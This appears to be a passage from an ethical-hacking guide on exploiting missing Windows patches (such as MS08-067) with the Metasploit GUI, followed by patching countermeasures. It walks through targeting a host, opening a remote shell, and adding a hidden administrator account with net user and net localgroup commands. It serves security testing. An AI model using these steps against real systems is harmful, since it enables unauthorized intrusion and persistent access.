Hacks That Exploit Missed Patches
It’s one thing to poke and prod Windows to find missing patches that might eventually lead to good information — maybe system access for a hacker. However, it’s quite another to stumble across a vulnerability that will provide you with full and complete system access — all within 10 minutes.
Well, it’s no longer an empty threat that “arbitrary code” can be run on a system that may lead to a vulnerability exploitation. Now, with such tools as Metasploit, all it takes is one missing patch on one system to gain access and demonstrate how the entire network can be compromised.
Before you go ’sploitin’ vulnerabilities with Metasploit, it’s very important to know that you’re venturing into sensitive territory. Not only can you gain full, unauthorized access to sensitive systems, but you can also put the systems being tested into a state where they can hang or reboot. So, read each exploit’s documentation and proceed with caution.
Before you can exploit a missing patch or related vulnerability, you have to find out what’s available for exploitation. The best way to go about doing this is to use a tool such as QualysGuard or LanGuard to find them.
After you find a vulnerability, the next step is to exploit it. Here’s how:
Download and install Metasploit from www.metasploit.com/download.
After the installation is complete, run the Metasploit GUI (now referred to as MSFGUI), which is Metasploit’s main console.
There’s also a web-based version of Metasploit that you can access through your browser.
Expand the Exploits option to see what exploits are available to run.
If you know the specific vulnerability (say, Microsoft’s MS08-067), you can simply enter part or all of the search term (such as ms08) in the search field at the top and then click Find.
After you find the exploit you want to run against your target system, simply double-click the exploit and then follow the steps starting with selecting the target operating system; click the Forward button.
Select Automatic Targeting if it’s available; otherwise, make your best guess of which version of Windows is running and then click the Forward button.
Select the payload (the specific hack) you want to send to the target and then click the Forward button.
Enter the IP address of the target system in the RHOST field and confirm that the IP address shown in the LHOST field is the address of your testing system. Click the Forward button.
Confirm your settings on the final screen, and click the Apply button.
The job executes, and you see the shell session in the Sessions section in the lower-right quadrant of the Metasploit GUI.
Double-click the session and a new window opens with a command prompt on the target system.
To add a user, simply enter net user username password /add at the Metasploit command prompt.
Next, add the user to the local administrators group by entering net localgroup administrators username /add at the Metasploit command prompt. You can then log in to the remote system by mapping a drive to the C$ share or by connecting via Remote Desktop.
Three unique versions of Metasploit are available from Rapid7. The free edition outlined in the preceding steps is called Metasploit Community. It may be all you need if an occasional screenshot of remote access or similar is sufficient for your testing purposes.
There’s also Metasploit Express which adds features such as password auditing and evidence collection. Finally, there’s a full-blown commercial version called Metasploit Pro for the serious security professional. Metasploit Pro adds features for social engineering, web application scanning, and detailed reporting.
Note the workflow features in the tabs across the top including Analysis, Sessions, Campaigns, web Apps, and Reports. It’s a well-thought-out interface that takes the pain out of traditional security scanning, exploitation, and reporting, which is especially useful for the less technical IT professional.
Metasploit Pro provides you with the ability to import scanner findings (typically XML files) from third-party vulnerability scanners such as Acunetix web Vulnerability Scanner, Nmap, and QualysGuard. Simply click the Analysis tab and select Import.
After the scan data is imported, you can click Vulnerabilities (under Analysis) and see all the original vulnerability scanner findings. To exploit one of the vulnerabilities (it’ll have to be a supported exploit), simply click the finding under the Name column and you’ll be presented with a new page that allows you to exploit the flaw.
Numerous resources are available at www.metasploit.com/help. The power of Metasploit is unbelievable all by itself. Combine it with the exploit code that’s continually updated at Offensive Security’s Exploits Database, and you have practically everything you need if you choose to drill down to that level of exploitation.
Countermeasures against missing patch vulnerability exploits
Patch your systems — both the Windows OS and any Microsoft or third-party applications running on them. Seriously, that’s all there is to it.
To get your arms around the patching process, you have to automate it wherever you can. You can use Windows Update — or better yet — Windows Server Update Services (WSUS) for Microsoft-centric patches, which can be found at http://technet.microsoft.com/en-us/wsus/default.aspx. If you’re looking for a commercial alternative, check out GFI LanGuard’s patch management features and Lumension Patch and Remediation.